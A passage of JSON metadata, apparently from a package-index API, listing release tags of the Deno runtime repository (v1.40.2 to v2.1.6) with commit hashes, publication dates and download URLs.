ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v